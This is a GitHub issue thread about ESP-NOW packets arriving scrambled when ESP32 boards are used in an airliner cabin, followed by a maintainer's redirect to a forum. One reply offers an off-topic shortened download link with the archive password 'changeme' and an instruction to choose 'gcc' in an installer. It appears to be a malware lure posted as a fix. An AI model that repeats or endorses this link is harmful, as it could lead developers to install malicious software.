espressif/arduino-esp32 #10250: ESP-NOW on board commercial aircraft fails

NGL3324, 2024-08-27:
### Board

ESP32-S2

### Device Description

Adafruit MagTag

### Hardware Configuration

SPI to screen

### Version

v3.0.4

### IDE Name

Arduino IDE

### Operating System

W11

### Flash frequency

40MHz

### PSRAM enabled

yes

### Upload speed

115200

### Description

We have developed a fully functional sender-receiver (i.e. peer-to-peer) pair, using ESP32's on each side, and the ESP-NOW protocol.  We use long-range mode to maximize distance but the sender-receiver pair are only separated by 1 meter at the moment.  We use WiFi.mode(WIFI_AP_STA) because we do talk to external websites, but this is not necessary.  We register a callback per the usual esp_now_register_recv_cb(OnDataRecv).  All code is compatible with ESP3.x framework:  we use OnDataRecv(const esp_now_recv_info_t* info, const uint8_t* incomingData, int len) and we use memcpy(&myData, incomingData, sizeof(myData)) for data transfer.  Works fine - in the laboratory.

The problem:  in our standard laboratory, the connection is good.  No drop-outs, no missing data.  High speed, long range, all good.  BUT when we put the system (the exact same system, the actual one in our laboratory) on a commercial airline flight (just at our passenger seat) - the protocol fails.  The data is scrambled.  Random data comes through OnDataRecv.  Data can come through every second, even faster, when the code is calling for every 5 minutes.  Random noise is coming through.  This happens when we take off LR mode and move to any of b/g/n also.

We do not think this is a problem with code, or with hardware, because the exact system works fine in the laboratory, but fails on board the cabin of (any) aircraft.  5V power is being provided from laptop USB ports for both peers, not from aircraft power.  It must be something with high wireless noise environment on the aircraft?  Or intentional jamming?  The peers can register with each other;   WiFiScan() works fine and finds all aircraft WiFi networks fine, and we can display encryption and RSSI data fine.  Only OnDataRecv() fails.

Do you have any insight into this problem?

Thanks!

### Sketch

```cpp
7,000 lines, but see problem description - it's an environmental issue, looking for confirmation this is a known issue or not
```

### Debug Message

```plain
None
```

### I have checked existing issues, online documentation and the Troubleshooting Guide

- [X] I confirm I have checked existing issues, online documentation and Troubleshooting guide.

c0ffincolors, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

lbernstone, 2024-08-27:
This forum is for issues with arduino-esp32.  Please ask general questions at the [ESP32 Hardware Forum](https://esp32.com/viewforum.php?f=12)

NGL3324, 2024-08-27:
apologies, will do